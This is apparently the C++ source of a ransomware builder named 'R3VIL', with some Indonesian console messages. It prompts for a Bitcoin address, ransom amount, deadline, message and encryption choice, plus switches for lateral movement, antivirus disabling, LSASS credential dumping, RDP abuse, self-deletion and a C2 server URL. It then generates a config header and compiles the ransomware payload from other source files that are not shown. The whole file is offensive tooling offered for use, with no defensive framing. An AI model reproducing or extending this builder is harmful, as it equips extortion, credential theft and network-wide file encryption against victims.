// builder.cpp - R3VIL Ransomware FULL CUSTOM BUILDER with C2 Support
#include <iostream>
#include <fstream>
#include <string>
#include <filesystem>
#include <cstdlib>

namespace fs = std::filesystem;

struct RansomConfig {
    std::string btc_address = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa";
    std::string email = "decrypt@onionmail.org";
    double ransom_amount = 500.0;
    int deadline_hours = 72;
    std::string ransom_message = "Your files have been encrypted with military grade encryption.";
    std::string window_title = "R3VIL Ransomware";
    std::string encryption_method = "XChaCha20Poly1305";
    std::string file_extension = ".revil";
    std::string output_name = "r3vil_custom";
    bool enable_lateral_movement = true;
    bool enable_av_disable = true;
    bool self_delete_after = true;
    bool enable_lsass_dump = true;
    bool enable_rdp_abuse = true;
    std::string c2_server = "";
    bool enable_c2 = false;
};

void create_config_header(const RansomConfig& cfg) {
    std::ofstream out("config.h");
    if (!out.is_open()) {
        std::cout << "[✗] Gagal membuat config.h\n";
        return;
    }

    out << "// config.h - Generated by R3VIL Custom Builder\n";
    out << "#pragma once\n\n#include <string>\n\n";
    out << "const std::string RANSOM_BTC = \"" << cfg.btc_address << "\";\n";
    out << "const std::string RANSOM_EMAIL = \"" << cfg.email << "\";\n";
    out << "const double RANSOM_AMOUNT = " << cfg.ransom_amount << ";\n";
    out << "const int RANSOM_DEADLINE_HOURS = " << cfg.deadline_hours << ";\n";
    out << "const std::string RANSOM_MESSAGE = \"" << cfg.ransom_message << "\";\n";
    out << "const std::string WINDOW_TITLE = \"" << cfg.window_title << "\";\n";
    out << "const std::string ENCRYPTION_METHOD = \"" << cfg.encryption_method << "\";\n";
    out << "const std::string FILE_EXTENSION = \"" << cfg.file_extension << "\";\n";
    out << "const std::string OUTPUT_NAME = \"" << cfg.output_name << "\";\n";
    out << "const bool ENABLE_LATERAL_MOVEMENT = " << (cfg.enable_lateral_movement ? "true" : "false") << ";\n";
    out << "const bool ENABLE_AV_DISABLE = " << (cfg.enable_av_disable ? "true" : "false") << ";\n";
    out << "const bool SELF_DELETE_AFTER = " << (cfg.self_delete_after ? "true" : "false") << ";\n";
    out << "const bool ENABLE_LSASS_DUMP = " << (cfg.enable_lsass_dump ? "true" : "false") << ";\n";
    out << "const bool ENABLE_RDP_ABUSE = " << (cfg.enable_rdp_abuse ? "true" : "false") << ";\n";
    out << "const std::string C2_SERVER = \"" << cfg.c2_server << "\";\n";
    out << "const bool ENABLE_C2 = " << (cfg.enable_c2 ? "true" : "false") << ";\n";

    out.close();
    std::cout << "[✓] config.h berhasil dibuat\n";
}

int main() {
    std::cout << "\n========================================\n";
    std::cout << "     R3VIL Ransomware FULL CUSTOM BUILDER     \n";
    std::cout << "========================================\n\n";

    RansomConfig cfg;
    std::string input;

    std::cout << "1. BTC Address: "; std::getline(std::cin, input);
    if (!input.empty()) cfg.btc_address = input;

    std::cout << "2. Email: "; std::getline(std::cin, input);
    if (!input.empty()) cfg.email = input;

    std::cout << "3. Amount (USD): "; std::getline(std::cin, input);
    if (!input.empty()) cfg.ransom_amount = std::stod(input);

    std::cout << "4. Deadline (H): "; std::getline(std::cin, input);
    if (!input.empty()) cfg.deadline_hours = std::stoi(input);

    std::cout << "5. Message: "; std::getline(std::cin, input);
    if (!input.empty()) cfg.ransom_message = input;

    std::cout << "6. Title: "; std::getline(std::cin, input);
    if (!input.empty()) cfg.window_title = input;

    std::cout << "7. Encryption (1: XChaCha, 2: AES): "; std::getline(std::cin, input);
    cfg.encryption_method = (input == "2") ? "AES256CBC" : "XChaCha20Poly1305";

    std::cout << "8. Extension: "; std::getline(std::cin, input);
    if (!input.empty()) cfg.file_extension = (input[0] == '.') ? input : "." + input;

    std::cout << "9. Output Name: "; std::getline(std::cin, input);
    if (!input.empty()) cfg.output_name = input;

    std::cout << "10. Lateral Movement? (y/n): "; std::getline(std::cin, input);
    cfg.enable_lateral_movement = (input != "n");

    std::cout << "11. Disable AV? (y/n): "; std::getline(std::cin, input);
    cfg.enable_av_disable = (input != "n");

    std::cout << "12. Self-delete? (y/n): "; std::getline(std::cin, input);
    cfg.self_delete_after = (input != "n");

    std::cout << "13. LSASS Dump? (y/n): "; std::getline(std::cin, input);
    cfg.enable_lsass_dump = (input != "n");

    std::cout << "14. RDP Abuse? (y/n): "; std::getline(std::cin, input);
    cfg.enable_rdp_abuse = (input != "n");

    std::cout << "15. Enable C2? (y/n): "; std::getline(std::cin, input);
    cfg.enable_c2 = (input == "y");

    if (cfg.enable_c2) {
        std::cout << "16. C2 URL: ";
        std::getline(std::cin, cfg.c2_server);
        if (cfg.c2_server.empty()) cfg.c2_server = "https://localhost:5000";
    }

    create_config_header(cfg);

    std::string compile_cmd;
#ifdef _WIN32
    compile_cmd = "g++ -std=c++17 -o " + cfg.output_name + ".exe "
                  "revil.cpp src/network_mapper.cpp src/c2_communication.cpp src/ransom_gui.cpp "
                  "imgui/imgui*.cpp imgui/backends/imgui_impl_glfw.cpp imgui/backends/imgui_impl_opengl3.cpp "
                  "-Iimgui -Iimgui/backends "
                  "-lcryptopp -lcurl -lzip -lpthread -lws2_32 -lwinhttp -liphlpapi";
#else
    compile_cmd = "g++ -std=c++17 -o " + cfg.output_name + " "
                  "revil.cpp src/network_mapper.cpp src/c2_communication.cpp src/ransom_gui.cpp "
                  "imgui/imgui*.cpp imgui/backends/imgui_impl_glfw.cpp imgui/backends/imgui_impl_opengl3.cpp "
                  "-Iimgui -Iimgui/backends "
                  "-lcryptopp -lcurl -lzip -lpthread -lglfw -lGL -ldl";
#endif

    std::cout << "[*] Compiling...\n";
    int result = system(compile_cmd.c_str());

    if (result == 0) {
        std::cout << "[✓] BERHASIL! File: " << cfg.output_name << "\n";
    } else {
        std::cout << "[✗] Compile gagal.\n";
    }

    return 0;
}
